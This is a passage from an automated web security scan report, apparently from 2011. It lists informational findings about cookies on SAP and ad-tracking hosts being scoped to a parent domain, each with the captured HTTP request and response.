'profile.geo_zip=05672',
'profile.geo_gmt_offset=-400',
'profile.geo_country=usa',
'profile.geo_country_code=840',
'profile.geo_region=v
...[SNIP]...

11.8. http://segment-pixel.invitemedia.com/set_partner_uid  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /set_partner_uid

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set_partner_uid?partnerID=169&partnerUID=4e99a41848264554&sscs_active=1 HTTP/1.1
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: http://s7.addthis.com/static/r07/sh62.html
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: segment-pixel.invitemedia.com
Proxy-Connection: Keep-Alive
Cookie: segments_p1="eJzjYuY4y8nFzPFejYuT40G4wM3by76yAPknOYDEZykuFo6N61mA5JEXjAD+JAwQ"; exchange_uid="eyI0IjogWyJDQUVTRUU0N0p5cG5jS2FHVzQzQnVoNlVleTQiLCA3MzQ0MTJdfQ=="; uid=b670d1b3-6ae0-4f57-baa7-b088401da6c3; partnerUID="eyI3OSI6IFsiMjdhM2YxMzlkOGZlMmI2MzdmNDY4NDdlMDkyNTdjYWIiLCB0cnVlXX0="; uid=0fd02718-925d-426f-97b4-9ed3e53d1800

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 15 Oct 2011 15:28:16 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 15-Oct-2011 15:27:56 GMT
Content-Type: image/gif
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: partnerUID="eyIxNjkiOiBbIjRlOTlhNDE4NDgyNjQ1NTQiLCB0cnVlXSwgIjc5IjogWyIyN2EzZjEzOWQ4ZmUyYjYzN2Y0Njg0N2UwOTI1N2NhYiIsIHRydWVdfQ=="; Domain=invitemedia.com; expires=Sun, 14-Oct-2012 15:28:16 GMT; Path=/
Content-Length: 43

GIF89a.............!.......,...........D..;

11.9. http://tracker.marinsm.com/tp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tracker.marinsm.com
Path:   /tp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tp?act=1&cid=559f7m7161&tz=5&ref=http%3A%2F%2Fwww.newsgator.com%2FDefault.aspx%3Ftabid%3D214&page=http%3A%2F%2Finfo.newsgator.com%2FTrial_SocialSites2010.html%3FLeadsource%3Dtrial&uuid=F4143347-478D-456F-9FDA-2CD5D97335AB&rnd=1601796576 HTTP/1.1
Host: tracker.marinsm.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://info.newsgator.com/Trial_SocialSites2010.html?Leadsource=trial
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.2.3.GA (build: SVNTag=JBoss_4_2_3_GA date=200807181417)/JBossWeb-2.0
P3P: CP="NOI DSP COR NID CUR ADM DEV OUR BUS"
Pragma: no-cache
Cache-Control: private, no-cache
Content-Type: image/gif
Content-Length: 35
Date: Sat, 15 Oct 2011 15:26:12 GMT
Connection: close
Set-Cookie: _msuuid=32d19f84-4f91-4f43-8f60-0290f902cb33; Domain=marinsm.com; Expires=Sun, 14-Oct-2012 15:26:12 GMT; Path=/

GIF89a.............,...........D..;

11.10. https://training.sap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://training.sap.com
Path:   /

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: training.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 15 Oct 2011 14:58:52 GMT
Server: Apache
Set-Cookie: ecomssid=fvscn6jrn5dm1p8m0c17ts0du0; path=/; domain=.sap.com; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: ecomguid=3f868610-479e-adc4-fdf5-6eba419da7ce; expires=Sun, 14-Oct-2012 14:58:52 GMT; path=/; domain=.sap.com; httponly
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; expires=Mon, 14-Oct-2013 14:58:52 GMT; path=/; domain=.sap.com; httponly
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Set-Cookie: UsersDefaultCountry=CA; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Set-Cookie: UsersDefaultLanguage=EN; expires=Mon, 14-Nov-2011 14:58:53 GMT; path=/; domain=.sap.com
Location: /ca/en/
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


11.11. http://www.sap.com/Tracking.epi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /Tracking.epi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /Tracking.epi?kNtBzmUK9zU HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
Content-Length: 214
Origin: http://www.sap.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Content-Type: application/xml
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CMPFIELDCRM-US11-XEC-CS11TRIAL-QUERYSTRINGFIELD=URL_ID=Q311_cs2011_freetrial_estore; CMPFIELDCRM-US11-XEC-CS11TRIAL-URL=LANDING PAGE=http%3a%2f%2fwww.sap.com%2fcampaign%2f2011_CURR_SAP_Crystal_Reports_Server_2011%2findex.epx%3fURL_ID%3dQ311_cs2011_freetrial_estore%26kNtBzmUK9zU%3d1; CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; CMPFIELDCRM-US11-XEC-CS11TRIAL-HIDDENFIELD=OFT-EMEA=False&OFT-LatAm=False&OFT-APJ=False&InquiryType=Campaign&InquiryLevel=Premium&Segment=CROSS; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx

{"method":"TrackEventInteraction","arguments":["http://www.sap.com/index.epx#/buy-now/index.epx?class=utilitynav-buy","","CLICK","Shop the Business Center","http://store.sap.com/","","ClickArea=CTA","
...[SNIP]...

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 0
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:46 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:46 GMT; path=/
Set-Cookie: SAP.SITE.COOKIE=cmpgn.code=CRM-US11-XEC-CS11TRIAL&cmpn=CRM-GM09-SMP-SAPCOM%3bCRM-US11-XEC-CS11TRIAL&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; domain=.sap.com; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:46 GMT


11.12. http://www.sap.com/about-sap/company/legal/privacy.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/company/legal/privacy.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-sap/company/legal/privacy.epx?sapmtn=emptypageforinlineframe&kNtBzmUK9zU=1 HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442; CountryRedirectFlag=1; SelectedCountryUrl=/index.epx; 37021986-VID=546022977410; 37021986-SKEY=449600187523043155; HumanClickSiteContainerID_37021986=STANDALONE; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:01:42 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:01:42 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|LOB=PTWN000005,9|SEGMENT=SEG0001,9|INDUSTRY=INDA000018,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 15:01:42 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:01:42 GMT
Content-Length: 22056


<html>
   <head>
       <title>SAP - SAP Privacy Statement</title>    
       <meta http-equiv=Content-Type content="text/html; charset=utf-8">
       <meta id="metaContentLanguage" http-equiv="Content-Language" co
...[SNIP]...

11.13. http://www.sap.com/about-sap/events/worldtour/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /about-sap/events/worldtour/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /about-sap/events/worldtour/index.epx HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.sapphirenow.com/login.aspx?ReturnUrl=%2fdefault.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; mbox=session#1318688512533-813903#1318690554|check#true#1318688754; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Aforums%7C1318690514391%3B%20pe%3Dno%2520value%7C1318690514393%3B%20c3%3Dno%2520value%7C1318690514395%3B%20s_nr%3D1318688714402-New%7C1321280714402%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292314404%3B%20s_visit%3D1%7C1318690514405%3B%20gpv_p47%3Dno%2520value%7C1318690514407%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D3%3B%20s_sq%3D%3B; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:25:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:25:57 GMT; path=/
Set-Cookie: CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapphirenow.com%2flogin.aspx%3fReturnUrl%3d%2fdefault.aspx; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:25:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:25:57 GMT
Content-Length: 42136


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script langua
...[SNIP]...

11.14. http://www.sap.com/asset/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /asset/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /asset/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 18873
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:58 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:58 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:03:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.15. http://www.sap.com/buy-now/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /buy-now/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /buy-now/index.epx?class=utilitynav-buy&_=1318689048629 HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.sap.com/index.epx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fwww.sapvirtualevents.com%2fteched%2fdefault.aspx; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; mbox=session#1318688512533-813903#1318690909|check#true#1318689109

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:30:37 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:30:37 GMT; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:30:37 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:30:37 GMT
Content-Length: 9958


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.16. http://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore HTTP/1.1
Host: www.sap.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://store.businessobjects.com/DRHM/store?Action=DisplayProductDetailsPage&SiteID=bobjamer&Locale=en_US&Env=BASE&productID=231860300&parentCategoryID=57065700&categoryID=57066300&_s_icmp=CG4E7A594
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; session=b72078a3-ae4c-4516-ad61-f5a89d864bda; CountryRedirectFlag=1; ASP.NET_SessionId=lses3swo01d05twdca0myv0y; _mkto_trk=id:852-NRZ-712&token:_mch-sap.com-1318688701033-84396; SAP.SITE.COOKIE=cmpgn.code=CRM-GM09-SMP-SAPCOM&cmpn=CRM-GM09-SMP-SAPCOM&profile_checked=http%3a%2f%2fwww.sap.com%2fabout-sap%2fevents%2fworldtour%2findex.epx; s_pers=%20s_ttc%3D1318688493%7C1350224686878%3B%20c13%3Dscn%253Aglo%253Ablog%7C1318690649534%3B%20pe%3Dno%2520value%7C1318690649536%3B%20c3%3Dscn%253Ablog%253Abrian%2520bernard%253Atune%2520in%2520to%2520sap%2520teched%2520live%2521%7C1318690649538%3B%20s_nr%3D1318688849551-New%7C1321280849551%3B%20s_sapvisid%3D50271dcd9baa4ef3893c9fb47c6b6fd7%7C1448292449554%3B%20s_visit%3D1%7C1318690649555%3B%20gpv_p47%3Dno%2520value%7C1318690649557%3B; s_sess=%20s_cc%3Dtrue%3B%20v18%3D4%3B%20s_sq%3D%3B; mbox=session#1318688512533-813903#1318690909|check#true#1318689109; 37021986-VID=5110247826455; 37021986-SKEY=3723022180028337440; HumanClickSiteContainerID_37021986=STANDALONE; client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; SAP.TTC=1318688493; CodeTrackingCookie=ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|

Response

HTTP/1.1 302 Found
Cache-Control: private
Content-Length: 251
Content-Type: text/html; charset=utf-8
Location: https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&kNtBzmUK9zU=1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=50271dcd-9baa-4ef3-893c-9fb47c6b6fd7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:32:09 GMT; path=/
Set-Cookie: SAP.TTC=1318688493; domain=.sap.com; expires=Fri, 13-Jan-2012 15:32:09 GMT; path=/
Set-Cookie: CodeTrackingCookie=url_campaignId=Q311_cs2011_freetrial_estore&ExternalReferrerURL=http%3a%2f%2fstore.businessobjects.com%2fDRHM%2fstore%3fAction%3dDisplayProductDetailsPage%26SiteID%3dbobjamer%26Locale%3den_US%26Env%3dBASE%26productID%3d231860300%26parentCategoryID%3d57065700%26categoryID%3d57066300%26_s_icmp%3dCG4E7A594; domain=.sap.com; path=/
Set-Cookie: SAP_SCORING_COOKIE=SOLUTION=BARB003001,9|SOLUTION=BARB003001,9|; domain=.sap.com; expires=Mon, 15-Oct-2012 14:32:09 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:32:09 GMT

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="https://www.sap.com/campaign/2011_CURR_SAP_Crystal_Reports_Server_2011/index.epx?URL_ID=Q311_cs2011_freetrial_estore&
...[SNIP]...

11.17. http://www.sap.com/common/formAbandonWarning.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /common/formAbandonWarning.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /common/formAbandonWarning.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 4767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:02:57 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:02:57 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 15:02:57 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.18. http://www.sap.com/country-selector.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /country-selector.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /country-selector.epx HTTP/1.1
Host: www.sap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sap.com/index.epx
Cookie: nwt=wetnow; ARPT=ONKKMMS169.145.6.18CKMMM; client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; session=cd0b6b7c-45df-415c-9ca0-02363c80f71d; SAP.TTC=1318688442

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 14:20:48 GMT; path=/
Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 15:20:48 GMT; path=/
p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE"
Date: Sat, 15 Oct 2011 14:20:47 GMT
Content-Length: 16973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<!--[if IE 6 ]> <html xml:lang="en" lang="en" class="ie6" xmlns="http://www.w3.org/19
...[SNIP]...

11.19. http://www.sap.com/customer-showcase/growth/index.epx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sap.com
Path:   /customer-showcase/growth/index.epx

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /customer-showcase/growth/index.epx HTTP/1.1
Host: www.sap.com
Accept: */*
Accept-Language: en
